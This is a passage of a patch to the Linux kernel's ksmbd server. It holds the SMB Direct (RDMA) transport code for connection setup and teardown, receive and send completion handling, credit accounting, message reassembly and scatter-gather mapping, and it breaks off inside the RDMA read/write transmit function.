++	spin_lock_init(&t->lock_new_recv_credits);
++
++	INIT_DELAYED_WORK(&t->post_recv_credits_work,
++			  smb_direct_post_recv_credits);
++	INIT_WORK(&t->send_immediate_work, smb_direct_send_immediate_work);
++	INIT_WORK(&t->disconnect_work, smb_direct_disconnect_rdma_work);
++
++	conn = ksmbd_conn_alloc();
++	if (!conn)
++		goto err;
++	conn->transport = KSMBD_TRANS(t);
++	KSMBD_TRANS(t)->conn = conn;
++	KSMBD_TRANS(t)->ops = &ksmbd_smb_direct_transport_ops;
++	return t;
++err:
++	kfree(t);
++	return NULL;
++}
++
++static void free_transport(struct smb_direct_transport *t)
++{
++	struct smb_direct_recvmsg *recvmsg;
++
++	wake_up_interruptible(&t->wait_send_credits);
++
++	ksmbd_debug(RDMA, "wait for all send posted to IB to finish\n");
++	wait_event(t->wait_send_pending,
++		   atomic_read(&t->send_pending) == 0);
++
++	cancel_work_sync(&t->disconnect_work);
++	cancel_delayed_work_sync(&t->post_recv_credits_work);
++	cancel_work_sync(&t->send_immediate_work);
++
++	if (t->qp) {
++		ib_drain_qp(t->qp);
++		ib_mr_pool_destroy(t->qp, &t->qp->rdma_mrs);
++		ib_destroy_qp(t->qp);
++	}
++
++	ksmbd_debug(RDMA, "drain the reassembly queue\n");
++	do {
++		spin_lock(&t->reassembly_queue_lock);
++		recvmsg = get_first_reassembly(t);
++		if (recvmsg) {
++			list_del(&recvmsg->list);
++			spin_unlock(&t->reassembly_queue_lock);
++			put_recvmsg(t, recvmsg);
++		} else {
++			spin_unlock(&t->reassembly_queue_lock);
++		}
++	} while (recvmsg);
++	t->reassembly_data_length = 0;
++
++	if (t->send_cq)
++		ib_free_cq(t->send_cq);
++	if (t->recv_cq)
++		ib_free_cq(t->recv_cq);
++	if (t->pd)
++		ib_dealloc_pd(t->pd);
++	if (t->cm_id)
++		rdma_destroy_id(t->cm_id);
++
++	smb_direct_destroy_pools(t);
++	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
++	kfree(t);
++}
++
++static struct smb_direct_sendmsg
++*smb_direct_alloc_sendmsg(struct smb_direct_transport *t)
++{
++	struct smb_direct_sendmsg *msg;
++
++	msg = mempool_alloc(t->sendmsg_mempool, GFP_KERNEL);
++	if (!msg)
++		return ERR_PTR(-ENOMEM);
++	msg->transport = t;
++	INIT_LIST_HEAD(&msg->list);
++	msg->num_sge = 0;
++	return msg;
++}
++
++static void smb_direct_free_sendmsg(struct smb_direct_transport *t,
++				    struct smb_direct_sendmsg *msg)
++{
++	int i;
++
++	if (msg->num_sge > 0) {
++		ib_dma_unmap_single(t->cm_id->device,
++				    msg->sge[0].addr, msg->sge[0].length,
++				    DMA_TO_DEVICE);
++		for (i = 1; i < msg->num_sge; i++)
++			ib_dma_unmap_page(t->cm_id->device,
++					  msg->sge[i].addr, msg->sge[i].length,
++					  DMA_TO_DEVICE);
++	}
++	mempool_free(msg, t->sendmsg_mempool);
++}
++
++static int smb_direct_check_recvmsg(struct smb_direct_recvmsg *recvmsg)
++{
++	switch (recvmsg->type) {
++	case SMB_DIRECT_MSG_DATA_TRANSFER: {
++		struct smb_direct_data_transfer *req =
++			(struct smb_direct_data_transfer *)recvmsg->packet;
++		struct smb2_hdr *hdr = (struct smb2_hdr *)(recvmsg->packet
++				+ le32_to_cpu(req->data_offset));
++		ksmbd_debug(RDMA,
++			    "CreditGranted: %u, CreditRequested: %u, DataLength: %u, RemainingDataLength: %u, SMB: %x, Command: %u\n",
++			    le16_to_cpu(req->credits_granted),
++			    le16_to_cpu(req->credits_requested),
++			    req->data_length, req->remaining_data_length,
++			    hdr->ProtocolId, hdr->Command);
++		break;
++	}
++	case SMB_DIRECT_MSG_NEGOTIATE_REQ: {
++		struct smb_direct_negotiate_req *req =
++			(struct smb_direct_negotiate_req *)recvmsg->packet;
++		ksmbd_debug(RDMA,
++			    "MinVersion: %u, MaxVersion: %u, CreditRequested: %u, MaxSendSize: %u, MaxRecvSize: %u, MaxFragmentedSize: %u\n",
++			    le16_to_cpu(req->min_version),
++			    le16_to_cpu(req->max_version),
++			    le16_to_cpu(req->credits_requested),
++			    le32_to_cpu(req->preferred_send_size),
++			    le32_to_cpu(req->max_receive_size),
++			    le32_to_cpu(req->max_fragmented_size));
++		if (le16_to_cpu(req->min_version) > 0x0100 ||
++		    le16_to_cpu(req->max_version) < 0x0100)
++			return -EOPNOTSUPP;
++		if (le16_to_cpu(req->credits_requested) <= 0 ||
++		    le32_to_cpu(req->max_receive_size) <= 128 ||
++		    le32_to_cpu(req->max_fragmented_size) <=
++					128 * 1024)
++			return -ECONNABORTED;
++
++		break;
++	}
++	default:
++		return -EINVAL;
++	}
++	return 0;
++}
++
++static void recv_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smb_direct_recvmsg *recvmsg;
++	struct smb_direct_transport *t;
++
++	recvmsg = container_of(wc->wr_cqe, struct smb_direct_recvmsg, cqe);
++	t = recvmsg->transport;
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_RECV) {
++		if (wc->status != IB_WC_WR_FLUSH_ERR) {
++			pr_err("Recv error. status='%s (%d)' opcode=%d\n",
++			       ib_wc_status_msg(wc->status), wc->status,
++			       wc->opcode);
++			smb_direct_disconnect_rdma_connection(t);
++		}
++		put_empty_recvmsg(t, recvmsg);
++		return;
++	}
++
++	ksmbd_debug(RDMA, "Recv completed. status='%s (%d)', opcode=%d\n",
++		    ib_wc_status_msg(wc->status), wc->status,
++		    wc->opcode);
++
++	ib_dma_sync_single_for_cpu(wc->qp->device, recvmsg->sge.addr,
++				   recvmsg->sge.length, DMA_FROM_DEVICE);
++
++	switch (recvmsg->type) {
++	case SMB_DIRECT_MSG_NEGOTIATE_REQ:
++		if (wc->byte_len < sizeof(struct smb_direct_negotiate_req)) {
++			put_empty_recvmsg(t, recvmsg);
++			return;
++		}
++		t->negotiation_requested = true;
++		t->full_packet_received = true;
++		t->status = SMB_DIRECT_CS_CONNECTED;
++		enqueue_reassembly(t, recvmsg, 0);
++		wake_up_interruptible(&t->wait_status);
++		break;
++	case SMB_DIRECT_MSG_DATA_TRANSFER: {
++		struct smb_direct_data_transfer *data_transfer =
++			(struct smb_direct_data_transfer *)recvmsg->packet;
++		unsigned int data_length;
++		int avail_recvmsg_count, receive_credits;
++
++		if (wc->byte_len <
++		    offsetof(struct smb_direct_data_transfer, padding)) {
++			put_empty_recvmsg(t, recvmsg);
++			return;
++		}
++
++		data_length = le32_to_cpu(data_transfer->data_length);
++		if (data_length) {
++			if (wc->byte_len < sizeof(struct smb_direct_data_transfer) +
++			    (u64)data_length) {
++				put_empty_recvmsg(t, recvmsg);
++				return;
++			}
++
++			if (t->full_packet_received)
++				recvmsg->first_segment = true;
++
++			if (le32_to_cpu(data_transfer->remaining_data_length))
++				t->full_packet_received = false;
++			else
++				t->full_packet_received = true;
++
++			enqueue_reassembly(t, recvmsg, (int)data_length);
++			wake_up_interruptible(&t->wait_reassembly_queue);
++
++			spin_lock(&t->receive_credit_lock);
++			receive_credits = --(t->recv_credits);
++			avail_recvmsg_count = t->count_avail_recvmsg;
++			spin_unlock(&t->receive_credit_lock);
++		} else {
++			put_empty_recvmsg(t, recvmsg);
++
++			spin_lock(&t->receive_credit_lock);
++			receive_credits = --(t->recv_credits);
++			avail_recvmsg_count = ++(t->count_avail_recvmsg);
++			spin_unlock(&t->receive_credit_lock);
++		}
++
++		t->recv_credit_target =
++				le16_to_cpu(data_transfer->credits_requested);
++		atomic_add(le16_to_cpu(data_transfer->credits_granted),
++			   &t->send_credits);
++
++		if (le16_to_cpu(data_transfer->flags) &
++		    SMB_DIRECT_RESPONSE_REQUESTED)
++			queue_work(smb_direct_wq, &t->send_immediate_work);
++
++		if (atomic_read(&t->send_credits) > 0)
++			wake_up_interruptible(&t->wait_send_credits);
++
++		if (is_receive_credit_post_required(receive_credits, avail_recvmsg_count))
++			mod_delayed_work(smb_direct_wq,
++					 &t->post_recv_credits_work, 0);
++		break;
++	}
++	default:
++		break;
++	}
++}
++
++static int smb_direct_post_recv(struct smb_direct_transport *t,
++				struct smb_direct_recvmsg *recvmsg)
++{
++	struct ib_recv_wr wr;
++	int ret;
++
++	recvmsg->sge.addr = ib_dma_map_single(t->cm_id->device,
++					      recvmsg->packet, t->max_recv_size,
++					      DMA_FROM_DEVICE);
++	ret = ib_dma_mapping_error(t->cm_id->device, recvmsg->sge.addr);
++	if (ret)
++		return ret;
++	recvmsg->sge.length = t->max_recv_size;
++	recvmsg->sge.lkey = t->pd->local_dma_lkey;
++	recvmsg->cqe.done = recv_done;
++
++	wr.wr_cqe = &recvmsg->cqe;
++	wr.next = NULL;
++	wr.sg_list = &recvmsg->sge;
++	wr.num_sge = 1;
++
++	ret = ib_post_recv(t->qp, &wr, NULL);
++	if (ret) {
++		pr_err("Can't post recv: %d\n", ret);
++		ib_dma_unmap_single(t->cm_id->device,
++				    recvmsg->sge.addr, recvmsg->sge.length,
++				    DMA_FROM_DEVICE);
++		smb_direct_disconnect_rdma_connection(t);
++		return ret;
++	}
++	return ret;
++}
++
++static int smb_direct_read(struct ksmbd_transport *t, char *buf,
++			   unsigned int size, int unused)
++{
++	struct smb_direct_recvmsg *recvmsg;
++	struct smb_direct_data_transfer *data_transfer;
++	int to_copy, to_read, data_read, offset;
++	u32 data_length, remaining_data_length, data_offset;
++	int rc;
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++
++again:
++	if (st->status != SMB_DIRECT_CS_CONNECTED) {
++		pr_err("disconnected\n");
++		return -ENOTCONN;
++	}
++
++	/*
++	 * No need to hold the reassembly queue lock all the time as we are
++	 * the only one reading from the front of the queue. The transport
++	 * may add more entries to the back of the queue at the same time
++	 */
++	if (st->reassembly_data_length >= size) {
++		int queue_length;
++		int queue_removed = 0;
++
++		/*
++		 * Need to make sure reassembly_data_length is read before
++		 * reading reassembly_queue_length and calling
++		 * get_first_reassembly. This call is lock free
++		 * as we never read at the end of the queue which are being
++		 * updated in SOFTIRQ as more data is received
++		 */
++		virt_rmb();
++		queue_length = st->reassembly_queue_length;
++		data_read = 0;
++		to_read = size;
++		offset = st->first_entry_offset;
++		while (data_read < size) {
++			recvmsg = get_first_reassembly(st);
++			data_transfer = smb_direct_recvmsg_payload(recvmsg);
++			data_length = le32_to_cpu(data_transfer->data_length);
++			remaining_data_length =
++				le32_to_cpu(data_transfer->remaining_data_length);
++			data_offset = le32_to_cpu(data_transfer->data_offset);
++
++			/*
++			 * The upper layer expects RFC1002 length at the
++			 * beginning of the payload. Return it to indicate
++			 * the total length of the packet. This minimize the
++			 * change to upper layer packet processing logic. This
++			 * will be eventually remove when an intermediate
++			 * transport layer is added
++			 */
++			if (recvmsg->first_segment && size == 4) {
++				unsigned int rfc1002_len =
++					data_length + remaining_data_length;
++				*((__be32 *)buf) = cpu_to_be32(rfc1002_len);
++				data_read = 4;
++				recvmsg->first_segment = false;
++				ksmbd_debug(RDMA,
++					    "returning rfc1002 length %d\n",
++					    rfc1002_len);
++				goto read_rfc1002_done;
++			}
++
++			to_copy = min_t(int, data_length - offset, to_read);
++			memcpy(buf + data_read, (char *)data_transfer + data_offset + offset,
++			       to_copy);
++
++			/* move on to the next buffer? */
++			if (to_copy == data_length - offset) {
++				queue_length--;
++				/*
++				 * No need to lock if we are not at the
++				 * end of the queue
++				 */
++				if (queue_length) {
++					list_del(&recvmsg->list);
++				} else {
++					spin_lock_irq(&st->reassembly_queue_lock);
++					list_del(&recvmsg->list);
++					spin_unlock_irq(&st->reassembly_queue_lock);
++				}
++				queue_removed++;
++				put_recvmsg(st, recvmsg);
++				offset = 0;
++			} else {
++				offset += to_copy;
++			}
++
++			to_read -= to_copy;
++			data_read += to_copy;
++		}
++
++		spin_lock_irq(&st->reassembly_queue_lock);
++		st->reassembly_data_length -= data_read;
++		st->reassembly_queue_length -= queue_removed;
++		spin_unlock_irq(&st->reassembly_queue_lock);
++
++		spin_lock(&st->receive_credit_lock);
++		st->count_avail_recvmsg += queue_removed;
++		if (is_receive_credit_post_required(st->recv_credits, st->count_avail_recvmsg)) {
++			spin_unlock(&st->receive_credit_lock);
++			mod_delayed_work(smb_direct_wq,
++					 &st->post_recv_credits_work, 0);
++		} else {
++			spin_unlock(&st->receive_credit_lock);
++		}
++
++		st->first_entry_offset = offset;
++		ksmbd_debug(RDMA,
++			    "returning to thread data_read=%d reassembly_data_length=%d first_entry_offset=%d\n",
++			    data_read, st->reassembly_data_length,
++			    st->first_entry_offset);
++read_rfc1002_done:
++		return data_read;
++	}
++
++	ksmbd_debug(RDMA, "wait_event on more data\n");
++	rc = wait_event_interruptible(st->wait_reassembly_queue,
++				      st->reassembly_data_length >= size ||
++				       st->status != SMB_DIRECT_CS_CONNECTED);
++	if (rc)
++		return -EINTR;
++
++	goto again;
++}
++
++static void smb_direct_post_recv_credits(struct work_struct *work)
++{
++	struct smb_direct_transport *t = container_of(work,
++		struct smb_direct_transport, post_recv_credits_work.work);
++	struct smb_direct_recvmsg *recvmsg;
++	int receive_credits, credits = 0;
++	int ret;
++	int use_free = 1;
++
++	spin_lock(&t->receive_credit_lock);
++	receive_credits = t->recv_credits;
++	spin_unlock(&t->receive_credit_lock);
++
++	if (receive_credits < t->recv_credit_target) {
++		while (true) {
++			if (use_free)
++				recvmsg = get_free_recvmsg(t);
++			else
++				recvmsg = get_empty_recvmsg(t);
++			if (!recvmsg) {
++				if (use_free) {
++					use_free = 0;
++					continue;
++				} else {
++					break;
++				}
++			}
++
++			recvmsg->type = SMB_DIRECT_MSG_DATA_TRANSFER;
++			recvmsg->first_segment = false;
++
++			ret = smb_direct_post_recv(t, recvmsg);
++			if (ret) {
++				pr_err("Can't post recv: %d\n", ret);
++				put_recvmsg(t, recvmsg);
++				break;
++			}
++			credits++;
++		}
++	}
++
++	spin_lock(&t->receive_credit_lock);
++	t->recv_credits += credits;
++	t->count_avail_recvmsg -= credits;
++	spin_unlock(&t->receive_credit_lock);
++
++	spin_lock(&t->lock_new_recv_credits);
++	t->new_recv_credits += credits;
++	spin_unlock(&t->lock_new_recv_credits);
++
++	if (credits)
++		queue_work(smb_direct_wq, &t->send_immediate_work);
++}
++
++static void send_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	struct smb_direct_sendmsg *sendmsg, *sibling;
++	struct smb_direct_transport *t;
++	struct list_head *pos, *prev, *end;
++
++	sendmsg = container_of(wc->wr_cqe, struct smb_direct_sendmsg, cqe);
++	t = sendmsg->transport;
++
++	ksmbd_debug(RDMA, "Send completed. status='%s (%d)', opcode=%d\n",
++		    ib_wc_status_msg(wc->status), wc->status,
++		    wc->opcode);
++
++	if (wc->status != IB_WC_SUCCESS || wc->opcode != IB_WC_SEND) {
++		pr_err("Send error. status='%s (%d)', opcode=%d\n",
++		       ib_wc_status_msg(wc->status), wc->status,
++		       wc->opcode);
++		smb_direct_disconnect_rdma_connection(t);
++	}
++
++	if (atomic_dec_and_test(&t->send_pending))
++		wake_up(&t->wait_send_pending);
++
++	/* iterate and free the list of messages in reverse. the list's head
++	 * is invalid.
++	 */
++	for (pos = &sendmsg->list, prev = pos->prev, end = sendmsg->list.next;
++	     prev != end; pos = prev, prev = prev->prev) {
++		sibling = container_of(pos, struct smb_direct_sendmsg, list);
++		smb_direct_free_sendmsg(t, sibling);
++	}
++
++	sibling = container_of(pos, struct smb_direct_sendmsg, list);
++	smb_direct_free_sendmsg(t, sibling);
++}
++
++static int manage_credits_prior_sending(struct smb_direct_transport *t)
++{
++	int new_credits;
++
++	spin_lock(&t->lock_new_recv_credits);
++	new_credits = t->new_recv_credits;
++	t->new_recv_credits = 0;
++	spin_unlock(&t->lock_new_recv_credits);
++
++	return new_credits;
++}
++
++static int smb_direct_post_send(struct smb_direct_transport *t,
++				struct ib_send_wr *wr)
++{
++	int ret;
++
++	atomic_inc(&t->send_pending);
++	ret = ib_post_send(t->qp, wr, NULL);
++	if (ret) {
++		pr_err("failed to post send: %d\n", ret);
++		if (atomic_dec_and_test(&t->send_pending))
++			wake_up(&t->wait_send_pending);
++		smb_direct_disconnect_rdma_connection(t);
++	}
++	return ret;
++}
++
++static void smb_direct_send_ctx_init(struct smb_direct_transport *t,
++				     struct smb_direct_send_ctx *send_ctx,
++				     bool need_invalidate_rkey,
++				     unsigned int remote_key)
++{
++	INIT_LIST_HEAD(&send_ctx->msg_list);
++	send_ctx->wr_cnt = 0;
++	send_ctx->need_invalidate_rkey = need_invalidate_rkey;
++	send_ctx->remote_key = remote_key;
++}
++
++static int smb_direct_flush_send_list(struct smb_direct_transport *t,
++				      struct smb_direct_send_ctx *send_ctx,
++				      bool is_last)
++{
++	struct smb_direct_sendmsg *first, *last;
++	int ret;
++
++	if (list_empty(&send_ctx->msg_list))
++		return 0;
++
++	first = list_first_entry(&send_ctx->msg_list,
++				 struct smb_direct_sendmsg,
++				 list);
++	last = list_last_entry(&send_ctx->msg_list,
++			       struct smb_direct_sendmsg,
++			       list);
++
++	last->wr.send_flags = IB_SEND_SIGNALED;
++	last->wr.wr_cqe = &last->cqe;
++	if (is_last && send_ctx->need_invalidate_rkey) {
++		last->wr.opcode = IB_WR_SEND_WITH_INV;
++		last->wr.ex.invalidate_rkey = send_ctx->remote_key;
++	}
++
++	ret = smb_direct_post_send(t, &first->wr);
++	if (!ret) {
++		smb_direct_send_ctx_init(t, send_ctx,
++					 send_ctx->need_invalidate_rkey,
++					 send_ctx->remote_key);
++	} else {
++		atomic_add(send_ctx->wr_cnt, &t->send_credits);
++		wake_up(&t->wait_send_credits);
++		list_for_each_entry_safe(first, last, &send_ctx->msg_list,
++					 list) {
++			smb_direct_free_sendmsg(t, first);
++		}
++	}
++	return ret;
++}
++
++static int wait_for_credits(struct smb_direct_transport *t,
++			    wait_queue_head_t *waitq, atomic_t *total_credits,
++			    int needed)
++{
++	int ret;
++
++	do {
++		if (atomic_sub_return(needed, total_credits) >= 0)
++			return 0;
++
++		atomic_add(needed, total_credits);
++		ret = wait_event_interruptible(*waitq,
++					       atomic_read(total_credits) >= needed ||
++					       t->status != SMB_DIRECT_CS_CONNECTED);
++
++		if (t->status != SMB_DIRECT_CS_CONNECTED)
++			return -ENOTCONN;
++		else if (ret < 0)
++			return ret;
++	} while (true);
++}
++
++static int wait_for_send_credits(struct smb_direct_transport *t,
++				 struct smb_direct_send_ctx *send_ctx)
++{
++	int ret;
++
++	if (send_ctx &&
++	    (send_ctx->wr_cnt >= 16 || atomic_read(&t->send_credits) <= 1)) {
++		ret = smb_direct_flush_send_list(t, send_ctx, false);
++		if (ret)
++			return ret;
++	}
++
++	return wait_for_credits(t, &t->wait_send_credits, &t->send_credits, 1);
++}
++
++static int wait_for_rw_credits(struct smb_direct_transport *t, int credits)
++{
++	return wait_for_credits(t, &t->wait_rw_credits, &t->rw_credits, credits);
++}
++
++static int calc_rw_credits(struct smb_direct_transport *t,
++			   char *buf, unsigned int len)
++{
++	return DIV_ROUND_UP(get_buf_page_count(buf, len),
++			    t->pages_per_rw_credit);
++}
++
++static int smb_direct_create_header(struct smb_direct_transport *t,
++				    int size, int remaining_data_length,
++				    struct smb_direct_sendmsg **sendmsg_out)
++{
++	struct smb_direct_sendmsg *sendmsg;
++	struct smb_direct_data_transfer *packet;
++	int header_length;
++	int ret;
++
++	sendmsg = smb_direct_alloc_sendmsg(t);
++	if (IS_ERR(sendmsg))
++		return PTR_ERR(sendmsg);
++
++	/* Fill in the packet header */
++	packet = (struct smb_direct_data_transfer *)sendmsg->packet;
++	packet->credits_requested = cpu_to_le16(t->send_credit_target);
++	packet->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
++
++	packet->flags = 0;
++	packet->reserved = 0;
++	if (!size)
++		packet->data_offset = 0;
++	else
++		packet->data_offset = cpu_to_le32(24);
++	packet->data_length = cpu_to_le32(size);
++	packet->remaining_data_length = cpu_to_le32(remaining_data_length);
++	packet->padding = 0;
++
++	ksmbd_debug(RDMA,
++		    "credits_requested=%d credits_granted=%d data_offset=%d data_length=%d remaining_data_length=%d\n",
++		    le16_to_cpu(packet->credits_requested),
++		    le16_to_cpu(packet->credits_granted),
++		    le32_to_cpu(packet->data_offset),
++		    le32_to_cpu(packet->data_length),
++		    le32_to_cpu(packet->remaining_data_length));
++
++	/* Map the packet to DMA */
++	header_length = sizeof(struct smb_direct_data_transfer);
++	/* If this is a packet without payload, don't send padding */
++	if (!size)
++		header_length =
++			offsetof(struct smb_direct_data_transfer, padding);
++
++	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
++						 (void *)packet,
++						 header_length,
++						 DMA_TO_DEVICE);
++	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
++	if (ret) {
++		smb_direct_free_sendmsg(t, sendmsg);
++		return ret;
++	}
++
++	sendmsg->num_sge = 1;
++	sendmsg->sge[0].length = header_length;
++	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
++
++	*sendmsg_out = sendmsg;
++	return 0;
++}
++
++static int get_sg_list(void *buf, int size, struct scatterlist *sg_list, int nentries)
++{
++	bool high = is_vmalloc_addr(buf);
++	struct page *page;
++	int offset, len;
++	int i = 0;
++
++	if (size <= 0 || nentries < get_buf_page_count(buf, size))
++		return -EINVAL;
++
++	offset = offset_in_page(buf);
++	buf -= offset;
++	while (size > 0) {
++		len = min_t(int, PAGE_SIZE - offset, size);
++		if (high)
++			page = vmalloc_to_page(buf);
++		else
++			page = kmap_to_page(buf);
++
++		if (!sg_list)
++			return -EINVAL;
++		sg_set_page(sg_list, page, len, offset);
++		sg_list = sg_next(sg_list);
++
++		buf += PAGE_SIZE;
++		size -= len;
++		offset = 0;
++		i++;
++	}
++	return i;
++}
++
++static int get_mapped_sg_list(struct ib_device *device, void *buf, int size,
++			      struct scatterlist *sg_list, int nentries,
++			      enum dma_data_direction dir)
++{
++	int npages;
++
++	npages = get_sg_list(buf, size, sg_list, nentries);
++	if (npages < 0)
++		return -EINVAL;
++	return ib_dma_map_sg(device, sg_list, npages, dir);
++}
++
++static int post_sendmsg(struct smb_direct_transport *t,
++			struct smb_direct_send_ctx *send_ctx,
++			struct smb_direct_sendmsg *msg)
++{
++	int i;
++
++	for (i = 0; i < msg->num_sge; i++)
++		ib_dma_sync_single_for_device(t->cm_id->device,
++					      msg->sge[i].addr, msg->sge[i].length,
++					      DMA_TO_DEVICE);
++
++	msg->cqe.done = send_done;
++	msg->wr.opcode = IB_WR_SEND;
++	msg->wr.sg_list = &msg->sge[0];
++	msg->wr.num_sge = msg->num_sge;
++	msg->wr.next = NULL;
++
++	if (send_ctx) {
++		msg->wr.wr_cqe = NULL;
++		msg->wr.send_flags = 0;
++		if (!list_empty(&send_ctx->msg_list)) {
++			struct smb_direct_sendmsg *last;
++
++			last = list_last_entry(&send_ctx->msg_list,
++					       struct smb_direct_sendmsg,
++					       list);
++			last->wr.next = &msg->wr;
++		}
++		list_add_tail(&msg->list, &send_ctx->msg_list);
++		send_ctx->wr_cnt++;
++		return 0;
++	}
++
++	msg->wr.wr_cqe = &msg->cqe;
++	msg->wr.send_flags = IB_SEND_SIGNALED;
++	return smb_direct_post_send(t, &msg->wr);
++}
++
++static int smb_direct_post_send_data(struct smb_direct_transport *t,
++				     struct smb_direct_send_ctx *send_ctx,
++				     struct kvec *iov, int niov,
++				     int remaining_data_length)
++{
++	int i, j, ret;
++	struct smb_direct_sendmsg *msg;
++	int data_length;
++	struct scatterlist sg[SMB_DIRECT_MAX_SEND_SGES - 1];
++
++	ret = wait_for_send_credits(t, send_ctx);
++	if (ret)
++		return ret;
++
++	data_length = 0;
++	for (i = 0; i < niov; i++)
++		data_length += iov[i].iov_len;
++
++	ret = smb_direct_create_header(t, data_length, remaining_data_length,
++				       &msg);
++	if (ret) {
++		atomic_inc(&t->send_credits);
++		return ret;
++	}
++
++	for (i = 0; i < niov; i++) {
++		struct ib_sge *sge;
++		int sg_cnt;
++
++		sg_init_table(sg, SMB_DIRECT_MAX_SEND_SGES - 1);
++		sg_cnt = get_mapped_sg_list(t->cm_id->device,
++					    iov[i].iov_base, iov[i].iov_len,
++					    sg, SMB_DIRECT_MAX_SEND_SGES - 1,
++					    DMA_TO_DEVICE);
++		if (sg_cnt <= 0) {
++			pr_err("failed to map buffer\n");
++			ret = -ENOMEM;
++			goto err;
++		} else if (sg_cnt + msg->num_sge > SMB_DIRECT_MAX_SEND_SGES) {
++			pr_err("buffer not fitted into sges\n");
++			ret = -E2BIG;
++			ib_dma_unmap_sg(t->cm_id->device, sg, sg_cnt,
++					DMA_TO_DEVICE);
++			goto err;
++		}
++
++		for (j = 0; j < sg_cnt; j++) {
++			sge = &msg->sge[msg->num_sge];
++			sge->addr = sg_dma_address(&sg[j]);
++			sge->length = sg_dma_len(&sg[j]);
++			sge->lkey  = t->pd->local_dma_lkey;
++			msg->num_sge++;
++		}
++	}
++
++	ret = post_sendmsg(t, send_ctx, msg);
++	if (ret)
++		goto err;
++	return 0;
++err:
++	smb_direct_free_sendmsg(t, msg);
++	atomic_inc(&t->send_credits);
++	return ret;
++}
++
++static int smb_direct_writev(struct ksmbd_transport *t,
++			     struct kvec *iov, int niovs, int buflen,
++			     bool need_invalidate, unsigned int remote_key)
++{
++	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
++	int remaining_data_length;
++	int start, i, j;
++	int max_iov_size = st->max_send_size -
++			sizeof(struct smb_direct_data_transfer);
++	int ret;
++	struct kvec vec;
++	struct smb_direct_send_ctx send_ctx;
++
++	if (st->status != SMB_DIRECT_CS_CONNECTED)
++		return -ENOTCONN;
++
++	//FIXME: skip RFC1002 header..
++	buflen -= 4;
++	iov[0].iov_base += 4;
++	iov[0].iov_len -= 4;
++
++	remaining_data_length = buflen;
++	ksmbd_debug(RDMA, "Sending smb (RDMA): smb_len=%u\n", buflen);
++
++	smb_direct_send_ctx_init(st, &send_ctx, need_invalidate, remote_key);
++	start = i = 0;
++	buflen = 0;
++	while (true) {
++		buflen += iov[i].iov_len;
++		if (buflen > max_iov_size) {
++			if (i > start) {
++				remaining_data_length -=
++					(buflen - iov[i].iov_len);
++				ret = smb_direct_post_send_data(st, &send_ctx,
++								&iov[start], i - start,
++								remaining_data_length);
++				if (ret)
++					goto done;
++			} else {
++				/* iov[start] is too big, break it */
++				int nvec  = (buflen + max_iov_size - 1) /
++						max_iov_size;
++
++				for (j = 0; j < nvec; j++) {
++					vec.iov_base =
++						(char *)iov[start].iov_base +
++						j * max_iov_size;
++					vec.iov_len =
++						min_t(int, max_iov_size,
++						      buflen - max_iov_size * j);
++					remaining_data_length -= vec.iov_len;
++					ret = smb_direct_post_send_data(st, &send_ctx, &vec, 1,
++									remaining_data_length);
++					if (ret)
++						goto done;
++				}
++				i++;
++				if (i == niovs)
++					break;
++			}
++			start = i;
++			buflen = 0;
++		} else {
++			i++;
++			if (i == niovs) {
++				/* send out all remaining vecs */
++				remaining_data_length -= buflen;
++				ret = smb_direct_post_send_data(st, &send_ctx,
++								&iov[start], i - start,
++								remaining_data_length);
++				if (ret)
++					goto done;
++				break;
++			}
++		}
++	}
++
++done:
++	ret = smb_direct_flush_send_list(st, &send_ctx, true);
++
++	/*
++	 * As an optimization, we don't wait for individual I/O to finish
++	 * before sending the next one.
++	 * Send them all and wait for pending send count to get to 0
++	 * that means all the I/Os have been out and we are good to return
++	 */
++
++	wait_event(st->wait_send_pending,
++		   atomic_read(&st->send_pending) == 0);
++	return ret;
++}
++
++static void smb_direct_free_rdma_rw_msg(struct smb_direct_transport *t,
++					struct smb_direct_rdma_rw_msg *msg,
++					enum dma_data_direction dir)
++{
++	rdma_rw_ctx_destroy(&msg->rw_ctx, t->qp, t->qp->port,
++			    msg->sgt.sgl, msg->sgt.nents, dir);
++	sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
++	kfree(msg);
++}
++
++static void read_write_done(struct ib_cq *cq, struct ib_wc *wc,
++			    enum dma_data_direction dir)
++{
++	struct smb_direct_rdma_rw_msg *msg = container_of(wc->wr_cqe,
++							  struct smb_direct_rdma_rw_msg, cqe);
++	struct smb_direct_transport *t = msg->t;
++
++	if (wc->status != IB_WC_SUCCESS) {
++		msg->status = -EIO;
++		pr_err("read/write error. opcode = %d, status = %s(%d)\n",
++		       wc->opcode, ib_wc_status_msg(wc->status), wc->status);
++		if (wc->status != IB_WC_WR_FLUSH_ERR)
++			smb_direct_disconnect_rdma_connection(t);
++	}
++
++	complete(msg->completion);
++}
++
++static void read_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	read_write_done(cq, wc, DMA_FROM_DEVICE);
++}
++
++static void write_done(struct ib_cq *cq, struct ib_wc *wc)
++{
++	read_write_done(cq, wc, DMA_TO_DEVICE);
++}
++
++static int smb_direct_rdma_xmit(struct smb_direct_transport *t,
++				void *buf, int buf_len,
++				struct smb2_buffer_desc_v1 *desc,
++				unsigned int desc_len,
++				bool is_read)
++{
++	struct smb_direct_rdma_rw_msg *msg, *next_msg;
++	int i, ret;
++	DECLARE_COMPLETION_ONSTACK(completion);
++	struct ib_send_wr *first_wr;
++	LIST_HEAD(msg_list);
++	char *desc_buf;
++	int credits_needed;
++	unsigned int desc_buf_len;
++	size_t total_length = 0;
++
++	if (t->status != SMB_DIRECT_CS_CONNECTED)
++		return -ENOTCONN;
++
++	/* calculate needed credits */
++	credits_needed = 0;
++	desc_buf = buf;
++	for (i = 0; i < desc_len / sizeof(*desc); i++) {
++		desc_buf_len = le32_to_cpu(desc[i].length);
++
++		credits_needed += calc_rw_credits(t, desc_buf, desc_buf_len);
++		desc_buf += desc_buf_len;
++		total_length += desc_buf_len;
++		if (desc_buf_len == 0 || total_length > buf_len ||
++		    total_length > t->max_rdma_rw_size)
++			return -EINVAL;
++	}
++
